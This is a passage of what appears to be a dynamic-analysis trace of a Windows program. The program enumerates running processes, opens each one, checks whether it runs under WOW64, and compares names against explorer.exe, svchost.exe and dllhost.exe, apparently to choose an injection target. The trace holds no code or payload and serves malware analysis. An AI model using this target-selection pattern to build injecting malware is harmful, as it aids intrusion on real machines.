th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0236.434] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0236.435] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0236.435] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0236.436] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0236.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0236.436] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0236.437] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0236.437] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0236.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0236.438] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.438] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.438] CloseHandle (hObject=0xec) returned 1 [0236.438] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0236.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0236.438] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0236.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0236.439] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.439] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.439] CloseHandle (hObject=0xec) returned 1 [0236.439] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0236.439] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0236.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0236.440] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0236.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0236.440] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.440] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.440] CloseHandle (hObject=0xec) returned 1 [0236.440] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0236.440] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0236.441] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0236.441] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0236.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0236.441] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.441] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.441] CloseHandle (hObject=0xec) returned 1 [0236.441] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0236.441] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0236.441] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0236.441] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0236.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0236.442] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.442] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.442] CloseHandle (hObject=0xec) returned 1 [0236.442] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0236.442] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0236.442] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0236.442] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0236.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0236.442] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.443] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.443] CloseHandle (hObject=0xec) returned 1 [0236.443] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0236.443] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0236.443] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0236.443] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0236.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0236.443] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.443] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.443] CloseHandle (hObject=0xec) returned 1 [0236.444] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0236.444] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0236.444] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0236.444] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0236.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0236.444] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.444] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.444] CloseHandle (hObject=0xec) returned 1 [0236.444] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0236.444] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0236.444] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0236.444] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0236.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0236.445] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.445] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.445] CloseHandle (hObject=0xec) returned 1 [0236.445] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0236.445] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0236.445] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0236.445] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0236.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0236.445] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.445] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.446] CloseHandle (hObject=0xec) returned 1 [0236.446] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0236.446] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0236.446] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0236.446] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0236.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0236.446] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.446] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.446] CloseHandle (hObject=0xec) returned 1 [0236.446] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0236.446] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0236.446] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0236.446] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0236.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0236.447] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.447] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.447] CloseHandle (hObject=0xec) returned 1 [0236.447] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0236.447] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0236.447] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0236.447] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0236.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0236.448] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.448] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.448] CloseHandle (hObject=0xec) returned 1 [0236.448] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0236.448] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0236.448] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0236.448] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0236.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0236.448] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.448] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.448] CloseHandle (hObject=0xec) returned 1 [0236.448] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0236.448] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0236.448] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0236.448] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0236.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0236.449] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.449] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.449] CloseHandle (hObject=0xec) returned 1 [0236.449] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0236.449] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0236.449] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0236.449] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0236.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0236.450] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.450] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.450] CloseHandle (hObject=0xec) returned 1 [0236.450] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0236.450] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0236.450] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0236.450] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0236.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0236.450] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.450] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.450] CloseHandle (hObject=0xec) returned 1 [0236.450] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0236.450] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0236.451] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0236.451] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0236.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0236.451] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.451] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.451] CloseHandle (hObject=0xec) returned 1 [0236.451] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0236.451] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0236.451] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0236.451] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0236.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0236.452] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.452] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.452] CloseHandle (hObject=0xec) returned 1 [0236.452] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0236.452] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0236.452] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0236.452] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0236.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0236.452] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.452] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.452] CloseHandle (hObject=0xec) returned 1 [0236.453] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0236.453] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0236.453] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0236.453] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0236.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0236.453] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.453] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.453] CloseHandle (hObject=0xec) returned 1 [0236.453] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0236.453] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0236.453] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0236.453] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0236.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0236.454] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.454] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.454] CloseHandle (hObject=0xec) returned 1 [0236.454] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0236.454] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0236.454] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0236.454] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0236.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0236.454] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.454] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0236.455] CloseHandle (hObject=0xec) returned 1 [0236.455] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0236.455] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0236.455] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0236.455] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0236.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0236.455] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0236.456] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0236.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0236.456] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0236.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0236.457] Process32Next 